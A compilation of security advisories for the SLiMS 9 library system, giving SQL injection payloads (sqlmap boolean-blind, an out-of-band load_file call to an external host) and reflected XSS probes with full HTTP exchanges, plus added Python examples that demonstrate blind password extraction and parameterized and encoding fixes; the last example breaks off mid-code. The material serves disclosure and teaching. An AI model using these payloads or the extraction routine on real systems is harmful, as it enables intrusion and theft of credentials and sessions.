<pre><code>## Title: Senayan Library Management System v9.1.0 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.0/slims9_bulian-9.1.0.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin<br /><br />## Description:<br />The `class` GET parameter of the report view (manual insertion `point 3`)<br />is vulnerable to SQL injection.<br />A single quote was submitted in the `class` parameter and a general<br />error message was returned. Two single quotes (the SQL escape for a<br />literal quote) were then submitted and the error message disappeared,<br />which indicates that the value is placed unescaped inside a quoted<br />string literal in the query.<br />The payload below is sqlmap's MySQL RLIKE boolean-based blind technique:<br />when the injected condition is true the regex operand decodes to<br />`bbbb''` (0x626262622727) and the query runs normally; when it is false<br />it decodes to `(` (0x28), an invalid regular expression that makes MySQL<br />raise an error, so true and false conditions produce distinguishable<br />responses.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT<br />(CASE WHEN (8842=8842) THEN 0x626262622727 ELSE 0x28 END)) AND<br />'iuDJ'='iuDJ&membershipType=a''&collType=aaaa<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/qptgmu)<br /><br />## Time spent<br />`01:00:00`<br /><br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 11.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi<br /><br />## Description:<br />The `class` GET parameter of the report view (manual insertion `point 3`)<br />is vulnerable to SQL injection.<br />The payload '+(select<br />load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'<br />was submitted in the `class` parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC path naming a host on an external domain.<br />An interaction with that domain was observed, which shows that the<br />injected query was executed even though nothing from it appears in<br />the response (out-of-band detection). Note that the lookup is made by<br />the host running MySQL, and only a Windows MySQL server treats a UNC<br />path as a network resource; the sqlmap boolean-based blind payload<br />below confirms the same parameter in-band and does not depend on that.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT<br />(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND<br />'dLjf'='dLjf&membershipType=a&collType=aaaa<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)<br /><br />## Proof and Exploit:<br />[href](http://localhost:5001/sy5wji)<br /><br />## Time spent<br />`03:00:00`<br /></code></pre>
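The boolean-blind oracle described in the two SLiMS SQL-injection advisories above, as an added Python example that is not part of either advisory and not SLiMS code. It stands in for the PHP report page with a constructed SQLite database: SLiMS runs on MySQL, and SQLite has no RLIKE, so a user-defined REGEXP function is registered that fails with an SQL error on an invalid pattern, which is exactly the behaviour of MySQL RLIKE that sqlmap's payload relies on. The probe values, the hex operands 0x626262622727 / 0x28 and the `AND 'iuDJ'='iuDJ` tail are taken from the payload on the page; the `loan_report` and `member` tables, their rows, the `admin` password `S3cret!` and the use of SQLite are constructed for the example. It reproduces the single-quote / two-quote probe, the true/false oracle, uses the oracle to extract a value character by character, and shows that binding the parameter removes the oracle.

```python
import re
import sqlite3

QUOTE_OK_PATTERN = b"bbbb''"  # 0x626262622727 in the sqlmap payload: a valid regex
QUOTE_BAD_PATTERN = b"("      # 0x28: unbalanced parenthesis, regex compile error


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the SLiMS database (not its real schema)."""
    db = sqlite3.connect(":memory:")

    def regexp(pattern, value):
        # SQLite routes `x REGEXP y` to regexp(y, x). An invalid pattern raises
        # re.error, which sqlite3 surfaces as OperationalError: the same
        # "bad regex -> SQL error" oracle that MySQL RLIKE gives sqlmap.
        if isinstance(pattern, bytes):
            pattern = pattern.decode()
        return 1 if re.search(pattern, str(value)) else 0

    db.create_function("regexp", 2, regexp)
    db.executescript("""
        CREATE TABLE loan_report(year INTEGER, class TEXT, member_type TEXT, coll_type TEXT);
        INSERT INTO loan_report VALUES (2002, 'bbbb', 'a', 'aaaa');
        CREATE TABLE member(username TEXT, passwd TEXT);
        INSERT INTO member VALUES ('admin', 'S3cret!');
    """)
    return db


def report_vulnerable(db: sqlite3.Connection, cls: str) -> int:
    """The defect the advisories describe: the GET value is pasted into the SQL text."""
    sql = "SELECT COUNT(*) FROM loan_report WHERE year = 2002 AND class = '" + cls + "'"
    return db.execute(sql).fetchone()[0]


def report_parameterized(db: sqlite3.Connection, cls: str) -> int:
    """The fix: the value is bound, so it can only ever be compared as a string."""
    sql = "SELECT COUNT(*) FROM loan_report WHERE year = 2002 AND class = ?"
    return db.execute(sql, (cls,)).fetchone()[0]


def query_errors(db: sqlite3.Connection, cls: str) -> bool:
    """The manual probe from the advisory: does this value make the query fail?"""
    try:
        report_vulnerable(db, cls)
        return False
    except sqlite3.Error:
        return True


def rlike_payload(condition: str) -> str:
    """Same shape as the sqlmap payload on the page, with SQLite's REGEXP keyword
    and X'..' blob literals for the hex operands."""
    return ("bbbb''' REGEXP (SELECT CASE WHEN (" + condition + ") THEN X'"
            + QUOTE_OK_PATTERN.hex() + "' ELSE X'" + QUOTE_BAD_PATTERN.hex()
            + "' END) AND 'iuDJ'='iuDJ")


def oracle(db: sqlite3.Connection, condition: str) -> bool:
    """True when `condition` holds: the regex compiles and the page renders normally."""
    return not query_errors(db, rlike_payload(condition))


def binary_search(db, expr: str, lo: int, hi: int) -> int:
    """Find the integer value of SQL expression `expr` in [lo, hi] with ~log2 queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, "(" + expr + ") > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(db: sqlite3.Connection, username: str = "admin") -> str:
    """Character-by-character extraction using nothing but the true/false oracle."""
    row = "(SELECT passwd FROM member WHERE username = '" + username + "')"
    length = binary_search(db, "SELECT length(" + row + ")", 0, 64)
    chars = []
    for i in range(1, length + 1):
        expr = "SELECT unicode(substr(" + row + ", " + str(i) + ", 1))"
        chars.append(chr(binary_search(db, expr, 32, 126)))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("single quote errors:", query_errors(db, "'"), "| two quotes:", query_errors(db, "''"))
    print("oracle 1=1:", oracle(db, "1=1"), "| oracle 1=2:", oracle(db, "1=2"))
    print("extracted:", extract_password(db))
    # With binding, the false-branch payload is just an odd string: no error, no oracle.
    print("parameterized, false-branch payload:", report_parameterized(db, rlike_payload("1=2")))
```

With the vulnerable query the false branch raises an error and the true branch does not, which is all an attacker needs: seven oracle queries per character recover the constructed password. With the bound parameter both branches return the same empty result, so the technique has nothing to measure.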
<pre><code>## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9<br />Multiple XSS-Reflected vulnerabilities<br />## Author: nu11secur1ty<br />## Date: 12.09.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0<br /><br />## Description:<br />The value of the `keywords` request parameter is copied into the value<br />of an HTML tag attribute which is encapsulated in double quotation<br />marks (in the response below, the `content` attribute of the `og:url`<br />meta tag).<br />The probe m8vzl"><script>alert(document.cookie)</script>hidhc was<br />submitted in the keywords parameter.<br />This input was echoed unmodified in the application's response: the `">`<br />closes the attribute and the tag, so the script element that follows is<br />rendered and executes in the browser of anyone who opens the link.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```GET<br />GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br /><br />```<br />[+] Response:<br /><br />```HTTP/1<br />HTTP/1.1 200 OK<br />Date: Fri, 09 Dec 2022 06:23:20 GMT<br />Server: Apache/2.4.54 
(Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Frame-Options: SAMEORIGIN<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 29492<br /><br /><!--<br /># ===============================<br /># Classic SLiMS Template<br /># ===============================<br /># @Author: Waris Agung Widodo<br /># @Email: ido.alit@gmail.com<br /># @Date: 2018-01-23T11:25:57+07:00<br /># @Last modified by: Waris Agung Widodo<br /># @Last modified time: 2019-01-03T11:25:57+07:00<br />--><br /><!DOCTYPE html><br /><html><br /><head><br /> <meta charset="utf-8"><br /> <title>Open Source Library Management System | Senayan</title><br /> <meta name="viewport" content="width=device-width,<br />initial-scale=1, shrink-to-fit=no"><br /><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><br /> <meta http-equiv="Pragma" content="no-cache"/><br /> <meta http-equiv="Cache-Control" content="no-store, no-cache,<br />must-revalidate, post-check=0, pre-check=0"/><br /> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/><br /><br /> <meta name="description" content="Open Source Library<br />Management System | Senayan"><br /> <meta name="keywords" content="Open Source Library Management System"><br /> <meta name="viewport" content="width=device-width,<br />height=device-height, initial-scale=1"><br /> <meta name="generator" content="SLiMS 9 (Bulian)"><br /> <meta name="theme-color" content="#000"><br /><br /> <meta property="og:locale" content="en_US"/><br /> <meta property="og:type" content="book"/><br /> <meta property="og:title" content="Open Source Library Management<br />System | Senayan"/><br /> <meta property="og:description" content="Open Source Library<br />Management 
System"/><br /> <meta property="og:url"<br />content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ac60v3)<br /><br />## Time spent<br />`01:00:00`<br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9<br />XSS-Reflected- PHPSESSID Hijacking<br />## Author: nu11secur1ty<br />## Date: 12.08.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://slims.web.id/web/news/rilis-9.4.0/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0<br /><br />## Description:<br />The value of the `destination` request parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks (the `action` attribute of the member login form in the<br />response below; the `og:url` meta tag in the same response encodes the<br />value, the form action does not).<br />The probe zbuip"><script>alert(document.cookie)</script>jgoihbmmygl<br />was submitted URL-encoded in the destination parameter.<br />This input was echoed unmodified in the application's response: the `">`<br />closes the attribute and the tag and the script that follows runs in the<br />application's origin. Because the request below carries the<br />`SenayanMember` session cookie, such a script can read and exfiltrate it<br />unless the cookie is flagged HttpOnly, so an attacker can hijack the<br />session of any user who follows a crafted link.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```GET<br />GET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m<br />Origin: http://pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=member<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br
/>```<br />[+] Response:<br /><br />```HTTP/1<br />HTTP/1.1 200 OK<br />Date: Thu, 08 Dec 2022 18:43:20 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Frame-Options: SAMEORIGIN<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 30590<br /><br /><!--<br /># ===============================<br /># Classic SLiMS Template<br /># ===============================<br /># @Author: Waris Agung Widodo<br /># @Email: ido.alit@gmail.com<br /># @Date: 2018-01-23T11:25:57+07:00<br /># @Last modified by: Waris Agung Widodo<br /># @Last modified time: 2019-01-03T11:25:57+07:00<br />--><br /><!DOCTYPE html><br /><html><br /><head><br /> <meta charset="utf-8"><br /> <title>Open Source Library Management System | Senayan</title><br /> <meta name="viewport" content="width=device-width,<br />initial-scale=1, shrink-to-fit=no"><br /><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><br /> <meta http-equiv="Pragma" content="no-cache"/><br /> <meta http-equiv="Cache-Control" content="no-store, no-cache,<br />must-revalidate, post-check=0, pre-check=0"/><br /> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/><br /> <meta name="robots" content="noindex, follow"> <meta<br />name="description" content="Open Source Library Management System |<br />Senayan"><br /> <meta name="keywords" content="Open Source Library Management System"><br /> <meta name="viewport" content="width=device-width,<br />height=device-height, initial-scale=1"><br /> <meta name="generator" content="SLiMS 9 (Bulian)"><br /> <meta name="theme-color" content="#000"><br /><br /> <meta property="og:locale" content="en_US"/><br /> <meta property="og:type" content="book"/><br /> 
<meta property="og:title" content="Open Source Library Management<br />System | Senayan"/><br /> <meta property="og:description" content="Open Source Library<br />Management System"/><br /> <meta property="og:url"<br />content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/><br /> <meta property="og:site_name" content="Senayan"/><br /> <meta property="og:image"<br /> content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/><br /><br /> <meta name="twitter:card" content="summary"><br /> <meta name="twitter:url"<br />content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/><br /> <meta name="twitter:title" content="Open Source Library Management<br />System | Senayan"/><br /> <meta property="twitter:image"<br /> content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/><br /> <!-- // load bootstrap style --><br /> <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css"><br /> <!-- // font awesome --><br /> <link rel="stylesheet"<br />href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css"><br /> <!-- Tailwind CSS --><br /> <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css"><br /> <!-- Vegas CSS --><br /> <link rel="stylesheet"<br />href="template/default/assets/plugin/vegas/vegas.min.css"><br /> <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"<br />rel="stylesheet" type="text/css"/><br /> <!-- SLiMS CSS --><br /> <link rel="stylesheet" 
href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css"><br /> <!-- // Flag css --><br /> <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css"><br /> <!-- // my custom style --><br /> <link rel="stylesheet"<br />href="template/default/assets/css/style.css?v=20221209-014320"><br /><br /> <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/><br /><br /> <!-- // load vue js --><br /> <script src="template/default/assets/js/vue.min.js"></script><br /> <!-- // load jquery library --><br /> <script src="template/default/assets/js/jquery.min.js"></script><br /> <!-- // load popper javascript --><br /> <script src="template/default/assets/js/popper.min.js"></script><br /> <!-- // load bootstrap javascript --><br /> <script src="template/default/assets/js/bootstrap.min.js"></script><br /> <!-- // load vegas javascript --><br /> <script src="template/default/assets/plugin/vegas/vegas.min.js"></script><br /> <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script><br /> <!-- // load SLiMS javascript --><br /> <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script><br /> <script src="/slims9_bulian-9.4.0/js/gui.js"></script><br /> <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script><br /><br /></head><br /><body class="bg-grey-lightest"><br /><br /><br /> <div class="result-search page-member-area"><br /> <section id="section1 container-fluid"><br /> <header class="c-header"><br /> <div class="mask"></div><br /><br /><nav class="navbar navbar-expand-lg navbar-dark bg-transparent"><br /> <a class="navbar-brand inline-flex items-center" href="index.php"><br /> <svg<br /> class="fill-current text-white inline-block h-8 w-8"<br /> version="1.1"<br /> xmlns="http://www.w3.org/2000/svg"<br />xmlns:xlink="http://www.w3.org/1999/xlink"<br /> viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"<br /> xml:space="preserve"><br /> <path<br 
/>d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1<br /><br />l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2<br /><br />c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4<br /> C118.4,98.6,118.3,98.5,118.3,98.3z<br />M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6<br /><br />L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0<br /> c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z<br />M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/><br /> </svg><br /> <div class="inline-flex flex-col leading-tight ml-2"><br /> <h1 class="text-lg m-0 p-0">Senayan</h1><br /> </div><br /> </a><br /> <button class="navbar-toggler" type="button"<br />data-toggle="collapse" data-target="#navbarSupportedContent"<br /> aria-controls="navbarSupportedContent"<br />aria-expanded="false" aria-label="Toggle navigation"><br /> <span class="navbar-toggler-icon"></span><br /> </button><br /><br /> <div class="collapse navbar-collapse" id="navbarSupportedContent"><br /> <ul class="navbar-nav ml-auto"><br /> <li class="nav-item "><br /> <a class="nav-link" href="index.php">Home</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=libinfo">Information</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=news">News</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=help">Help</a><br /></li><li class="nav-item "><br /> <a class="nav-link" href="index.php?p=librarian">Librarian</a><br /></li> <li class="nav-item active"><br /> <a class="nav-link" href="index.php?p=member">Member Area</a><br /> </li><br /> <li class="nav-item dropdown"><br /> <a class="nav-link dropdown-toggle<br />cursor-pointer" 
type="button" id="languageMenuButton"<br /> data-toggle="dropdown" aria-haspopup="true"<br />aria-expanded="false"><br /> <span class="flag-icon flag-icon-us"<br />style="border-radius: 2px;"></span><br /> </a><br /> <div class="dropdown-menu bg-grey-lighter<br />dropdown-menu-lg-right" aria-labelledby="dropdownMenuButton"><br /> <h6 class="dropdown-header">Select Language : </h6><br /> <a class="dropdown-item"<br />href="index.php?select_lang=ar_SA"><br /> <span class="flag-icon flag-icon-sa mr-2"<br />style="border-radius: 2px;"></span> Arabic<br /> </a> <a class="dropdown-item" href="index.php?select_lang=bn_BD"><br /> <span class="flag-icon flag-icon-bd mr-2"<br />style="border-radius: 2px;"></span> Bengali<br /> </a> <a class="dropdown-item" href="index.php?select_lang=pt_BR"><br /> <span class="flag-icon flag-icon-br mr-2"<br />style="border-radius: 2px;"></span> Brazilian Portuguese<br /> </a> <a class="dropdown-item" href="index.php?select_lang=en_US"><br /> <span class="flag-icon flag-icon-us mr-2"<br />style="border-radius: 2px;"></span> English<br /> </a> <a class="dropdown-item" href="index.php?select_lang=es_ES"><br /> <span class="flag-icon flag-icon-es mr-2"<br />style="border-radius: 2px;"></span> Espanol<br /> </a> <a class="dropdown-item" href="index.php?select_lang=de_DE"><br /> <span class="flag-icon flag-icon-de mr-2"<br />style="border-radius: 2px;"></span> German<br /> </a> <a class="dropdown-item" href="index.php?select_lang=id_ID"><br /> <span class="flag-icon flag-icon-id mr-2"<br />style="border-radius: 2px;"></span> Indonesian<br /> </a> <a class="dropdown-item" href="index.php?select_lang=ja_JP"><br /> <span class="flag-icon flag-icon-jp mr-2"<br />style="border-radius: 2px;"></span> Japanese<br /> </a> <a class="dropdown-item" href="index.php?select_lang=my_MY"><br /> <span class="flag-icon flag-icon-my mr-2"<br />style="border-radius: 2px;"></span> Malay<br /> </a> <a class="dropdown-item" href="index.php?select_lang=fa_IR"><br /> 
<span class="flag-icon flag-icon-ir mr-2"<br />style="border-radius: 2px;"></span> Persian<br /> </a> <a class="dropdown-item" href="index.php?select_lang=ru_RU"><br /> <span class="flag-icon flag-icon-ru mr-2"<br />style="border-radius: 2px;"></span> Russian<br /> </a> <a class="dropdown-item" href="index.php?select_lang=th_TH"><br /> <span class="flag-icon flag-icon-th mr-2"<br />style="border-radius: 2px;"></span> Thai<br /> </a> <a class="dropdown-item" href="index.php?select_lang=tr_TR"><br /> <span class="flag-icon flag-icon-tr mr-2"<br />style="border-radius: 2px;"></span> Turkish<br /> </a> <a class="dropdown-item" href="index.php?select_lang=ur_PK"><br /> <span class="flag-icon flag-icon-pk mr-2"<br />style="border-radius: 2px;"></span> Urdu<br /> </a> </div><br /> </li><br /> </ul><br /> </div><br /></nav><br /> </header><br /> <div class="search" id="search-wraper"<br />xmlns:v-bind="http://www.w3.org/1999/xhtml"><br /> <div class="container"><br /> <div class="row"><br /> <div class="col-lg-8 mx-auto"><br /> <div class="card border-0 shadow"><br /> <div class="card-body"><br /> <form class="" action="index.php" method="get"<br />@submit.prevent="searchSubmit"><br /> <input type="hidden" name="search" value="search"><br /> <input ref="keywords" value=""<br />v-model.trim="keywords"<br /> @focus="searchOnFocus"<br />@blur="searchOnBlur" type="text" id="search-input"<br /> name="keywords"<br />class="input-transparent w-100" autocomplete="off"<br /> placeholder="Enter keyword to<br />search collection..."/><br /> </form><br /> </div><br /> </div><br /> <transition name="slide-fade"><br /> <div v-if="show" class="advanced-wraper shadow<br />mt-4" id="advanced-wraper"<br /> v-click-outside="hideSearch"><br /> <p class="label mb-2"><br /> Search by : <i<br />@click="hideSearch"<br /> class="far fa-times-circle float-right<br />text-danger cursor-pointer"></i><br /> </p><br /> <div class="d-flex flex-wrap"><br /> <a v-bind:class="{'btn-primary<br 
/>text-white': searchBy === 'keywords', 'btn-outline-secondary':<br />searchBy !== 'keywords' }"<br /> @click="searchOnClick('keywords')"<br />class="btn mr-2 mb-2">ALL</a><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'author', 'btn-outline-secondary': searchBy<br />!== 'author' }"<br /> @click="searchOnClick('author')"<br />class="btn mr-2 mb-2">Author</a><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'subject', 'btn-outline-secondary': searchBy<br />!== 'subject' }"<br /> @click="searchOnClick('subject')"<br />class="btn mr-2 mb-2">Subject</a><br /> <a v-bind:class="{'btn-primary<br />text-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy<br />!== 'isbn' }"<br /> @click="searchOnClick('isbn')"<br />class="btn mr-2 mb-2">ISBN/ISSN</a><br /> <button class="btn btn-light mr-2 mb-2"<br />disabled>OR TRY</button><br /> <a class="btn btn-outline-primary mr-2<br />mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a><br /> </div><br /> <p v-if="lastKeywords.length > 0" class="label<br />mt-4">Last search:</p><br /> <a<br />:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"<br /> class="flex items-center justify-between<br />py-1 text-decoration-none text-grey-darkest hover:text-blue"<br /> v-for="k in lastKeywords" :key="k"><span><i<br /> class="far fa-clock<br />text-grey-dark mr-2"></i><span class="italic<br />text-sm">{{tmpObj[k].text}}</span></span><i<br /> class="fas fa-angle-right<br />text-grey-dark"></i></a><br /> </div><br /> </transition><br /> </div><br /> </div><br /> </div><br /></div><br /> </section><br /><br /> <div class="container py-4"><br /> <div class="row"><br /> <div class="col-md-8"><br /> <div><br /> <div class="tagline">Library Member Login</div><br /> <div class="loginInfo">Please insert your member ID<br />and password given by library system administrator. 
If you are<br />library's member and don't have a password yet, please contact library<br />staff.</div><br /> <div class="loginInfo"><br /> <form<br />action="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"<br />method="post"><br /> <div class="fieldLabel">Member ID</div><br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/dsl863)<br /><br />## Time spent<br />`01:30:00`<br /><br /></code></pre>
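The attribute-context reflection shown in both SLiMS XSS advisories above (the `og:url` meta `content` attribute in v9.0.0, the login form `action` attribute in v9.4.0), as an added Python example that is not part of either advisory and not SLiMS code (SLiMS is PHP; this stands in for its template). It renders the form tag the way the v9.4.0 response shows it, renders it again with the two encoding layers the fix needs, and parses both outputs with Python's HTML tokenizer to show where the probe ends up. The probe text and the `index.php?p=member&destination=` URL are from the advisory; the parsing helper and the check functions are the example's own.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Probe of the shape used in the advisories: random prefix, attribute/tag breakout, random suffix.
PROBE = 'zbuip"><script>alert(document.cookie)</script>jgoihbmmygl'


def render_unsafe(destination: str) -> str:
    """What the v9.4.0 response shows: the raw parameter pasted into a quoted attribute."""
    return ('<form action="index.php?p=member&destination=' + destination
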